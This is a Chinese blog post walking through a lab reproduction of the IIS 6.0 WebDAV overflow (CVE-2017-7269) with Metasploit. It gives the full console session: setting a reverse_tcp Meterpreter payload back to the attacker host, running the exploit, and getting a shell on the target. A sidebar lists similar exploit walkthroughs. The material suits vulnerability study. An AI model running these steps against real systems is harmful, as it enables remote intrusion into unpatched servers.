Metasploit复现 IIS6.0远程溢出漏洞

最新推荐文章于 2024-06-23 18:00:00 发布
最新推荐文章于 2024-06-23 18:00:00 发布
阅读量3.9k 收藏 3
点赞数 1
分类专栏: 系统漏洞 文章标签: 溢出 代码执行 Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzxx123520/article/details/79156637
版权

漏洞描述

开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。

漏洞编号

CVE-2017-7269

漏洞等级

高危

影响产品

Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0

漏洞环境搭建

我的环境是windows 2003 R2 Enterprise Edition,安装好IIS 6.0 之后进入服务管理,在管理器中,有一个windows拓展,拓展中有一个webdav选项,该选项默认时禁止状态,右键选择允许就可以了。
这里写图片描述
随后windows+R–>services.msc–>打开webcClient服务,完成配置
这里写图片描述

漏洞测试

攻击机:kali IP :192.168.48.131
受害机:windows2003 IP :192.168.48.146
cve-2017-7269-master.zip
将exp放到
/usr/share/metasploitframework/modules/exploits/windows/iis目录下

msf > search cve-2017-7269

Matching Modules
================

   Name                                                 Disclosure Date  Rank    Description
   ----                                                 ---------------  ----    -----------
   exploit/windows/iis/cve-2017-7269                    2017-03-31       good    CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
   exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual   Microsoft IIS WebDav ScStoragePathFromUrl Overflow


msf > use exploit/windows/iis/cve-2017-7269 
msf exploit(windows/iis/cve-2017-7269) > show options 

Module options (exploit/windows/iis/cve-2017-7269):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HttpHost            localhost        yes       http host for target
   PhysicalPathLength  19               yes       length of physical path for target(include backslash)
   RHOST                                yes       The target address
   RPORT               80               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2


msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.48.146     //设置对方ip
RHOST => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.48.146       //设置对方网站
HttpHost => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp    //设置返回载荷
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.48.131    //设置本机ip
LHOST => 192.168.48.131
msf exploit(windows/iis/cve-2017-7269) > exploit     //溢出

[*] Started reverse TCP handler on 192.168.48.131:4444 
[*] Sending stage (179779 bytes) to 192.168.48.146
[*] Meterpreter session 1 opened (192.168.48.131:4444 -> 192.168.48.146:1043) at 2018-01-24 22:49:23 +0800

meterpreter >

现在可以执行系统命令了
这里写图片描述

c:\windows\system32\inetsrv>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter ��������:

   Connection-specific DNS Suffix  . : localdomain
   IP Address. . . . . . . . . . . . : 192.168.48.146
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.48.2

c:\windows\system32\inetsrv>

参考资料

CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit

土豆回锅
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
iis6.0远程代码执行漏洞
G208_522的博客
11-20 3460
iis6.0远程代码执行漏洞 1、实验环境搭建 目标主机Windows server2003 sp2 2、目标服务器需要在IIS里面开启WebDAV 3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址) Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址) 4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下: k
metasploitable2靶场渗透
weixin_45349299的博客
02-13 385
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
中间件安全IIS----文件解析漏洞利用
最新发布
Karka_的博客
06-23 850
IIS服务器主要存在两种解析缺陷:文件夹解析漏洞和分号截断漏洞。下面就来分别具体了解一下。
metasploit iis6.0溢出远程代码执行漏洞
cs_xiaoqiang的博客
01-23 1255
目标ip:192.168.0.106  本机ip:192.168.0.105 下载这次的exp:cve-2017-7269 将exp复制到/usr/share/metasploit-framework/modules/exploits/windows/iis目录下。(添加到metasploit 里面) 接下来打开metasploit 搜索exp
iis6.0渗透实战笔记
weixin_42345596的博客
05-31 1720
IIS IIS从1.0-10.0之间共有12个版本,1.0-4.0已基本退出市场,6.0-10.0居多。IIS7.5、IIS8.5以及IIS10.0、IIS6.0是目前使用最多的版本. IIS版本对应的Windows系统版本如下: IIS6.x渗透 准备环境:Windows server 2003 IP:192.168.173.194 接下来先搭环境 双击这里,进去之后点确定,默认选中的那三个,接着点击确定 点击下一步之后,出现了报错,这代表操作系统无法找到可用的iis6.0安装包,这里把
IIS .ASP文件缓冲区溢出漏洞
shaily读书学习
05-06 1725
涉及程序: ASP   描述: IIS .ASP文件缓冲区溢出漏洞   详细: 在Microsoft IIS 4.0的.ASP ISAPI文件解析机制中存在一个缓冲区溢出漏洞,利用该漏洞将可以获得SYSTEM水平的访问权限。 该漏洞是一个本地漏洞,但如果攻击者可以上传.acp文件,它将被远程利用。 在对Java Script中"LANGUAGE"变量的处理中,如果提供一个超长的字符串给"LANGU
IIS 6.0 远程溢出漏洞
瞎几把学
03-20 4665
<br />Oday摘要: 发布日期:2010-10.03发布作者:FoXHaCkEr影响版本:IIS6.0官方地址:Microsoft漏洞类型:远程溢出漏洞描述:微软IIS6.0一个远程溢出漏洞代码exp:#!/usr/bin/perl#*********!!!WARNING!!!*********#*FORSECURITYTESTiNGONLY!*#***********************************#  <br /><br />发布日期:2010-10.03<br />发布作者:Fo
最新IE 0day漏洞Metasploit生成方法.txt
03-18
最新IE 0day漏洞Metasploit生成方法.txt
metasploit实验报告及漏洞利用代码
01-11
Metasploit是一款强大的安全渗透测试工具,主要用于模拟攻击和检测系统漏洞。它是开源社区的瑰宝,由 Rapid7 维护,并且在全球范围内被安全研究人员、渗透测试人员以及网络安全专业人员广泛使用。本实验报告将深入...
metasploit中使用lnk漏洞渗透测试.doc
03-18
Metasploit 中使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
CVE-2017-7269-iis远程溢出漏洞复现
PANDA墨森的博客
06-19 622
##01漏洞描述 cve_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)发现的。IIS 6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行,目前针对 Windows Server 2003 R2 可以稳定利用。 下面开始复现cve_2017_7269漏洞,拿下windows 2003 R2权限,并远程登录服务器: ##02靶机实验环境 目标主机:Windows Server 2..
CVE2017-7269 IIS6.0利用MSF远程溢出漏洞提权
404
01-22 5289
漏洞编号:CVE2017-7269 服务器版本:Windows server 2003 中间件:IIS6.0 攻击工具:metasploit POC:CVE2017-7269.rb 靶机IP:192.168.1.175 攻击机IP:192.168.1.195 本地漏洞复现过程,安装windows server 2003 r2 开启IIS服务 利用poc: require '
MSF之IIS6WebDAV执行漏洞复现
极光时流
12-02 1581
MSF之IIS6WebDAV执行漏洞复现准备扫描漏洞 准备 实验准备环境: 靶机:虚拟机win2003 r2位系统,其IP为:10.101.63.150 攻击机:kali系统,其IP为:10.101.17.33 攻击工具:kali自带的msfconsole工具 靶机搭建iis6,可参考:https://jingyan.baidu.com/article/0aa22375bcffb388cc0d6...
Windows 提权------IIS6.exe溢出提权
selecthch的博客
06-26 3904
提权方式:          操作系统漏洞提权:               systeminfo               查看未修补的补丁编号               KB952004 MS09-012        PR    -pr.exe               KB956572 MS09-012        巴西烤肉               KB970483 MS09-...
分区起始位置参数溢出_IIS6.0缓冲区溢出漏洞深度分析(CVE20177269)
weixin_32998219的博客
12-13 747
漏洞描述开启WebDAV服务的IIS6.0存在缓冲区溢出漏洞可以任意代码执行,目前针对WindowsServer2003R2可以稳定利用。在WebDAV服务的ScStoragePathFromUrl函数存在缓冲区溢出漏洞,恶意访问者通过构造以If:header 头的 PROPFIND请求执行任意代码。工具环境windbg:用于附加w3wp进程进行动态调试IDA:用于对ht...
CVE-2017-7269 IIS6.0WebDAV远程代码执行漏洞复现(Window提权)
ranuy阮的博客
04-19 2451
漏洞说明:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证) 触发函数:ScStoragePathFromUr...
telnet命令详解
Metempsychosis_的专栏
06-27 3374
1、什么是Telnet?   对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。 2、Telnet被入侵者用来做什么   (1)Telnet是控制主机的第一手段
Tinyproxy堆溢出漏洞复现
05-09
Tinyproxy是一款轻量级的HTTP代理服务器,它可以在Linux/Unix系统上运行。在使用Tinyproxy的过程中,我们发现它存在一个堆溢出漏洞,攻击者可以利用该漏洞进行攻击,本文将介绍该漏洞复现过程。 漏洞描述 Tinyproxy中存在一个堆溢出漏洞,攻击者可以通过发送恶意的HTTP请求来触发该漏洞,导致程序崩溃或执行恶意代码复现步骤 1. 下载安装Tinyproxy 首先需要下载Tinyproxy,并安装在Linux/Unix系统上。可以通过以下命令进行安装: ``` sudo apt-get update sudo apt-get install tinyproxy ``` 2. 启动Tinyproxy 在安装完成后,可以通过以下命令启动Tinyproxy: ``` sudo service tinyproxy start ``` 3. 准备测试工具 我们需要使用一个测试工具,来发送恶意的HTTP请求。这里我们使用的是Metasploit框架中的`http_chunked`模块。如果你还没有安装Metasploit框架,可以通过以下命令进行安装: ``` sudo apt-get install metasploit-framework ``` 4. 构造恶意HTTP请求 使用`msfconsole`命令打开Metasploit框架,进入交互式界面。然后执行以下命令,构造恶意HTTP请求: ``` use auxiliary/scanner/http/http_chunked set RHOSTS <target_ip> set RPORT 8888 set TARGETURI / run ``` 其中,`<target_ip>`是目标机器的IP地址,`8888`是Tinyproxy的默认端口号。执行完上述命令后,Metasploit框架会发送恶意的HTTP请求到目标机器上。 5. 复现漏洞 当目标机器接收到恶意的HTTP请求时,Tinyproxy会尝试解析该请求。由于请求中的数据长度超出Tinyproxy的缓冲区大小,导致程序发生堆溢出,从而崩溃或执行恶意代码漏洞修复 目前,官方并没有发布该漏洞的修复版本。建议用户不要在生产环境中使用Tinyproxy,或者使用其他替代品。如果必须使用Tinyproxy,建议在防火墙等安全设备上,对Tinyproxy进行限制,避免攻击者利用该漏洞进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值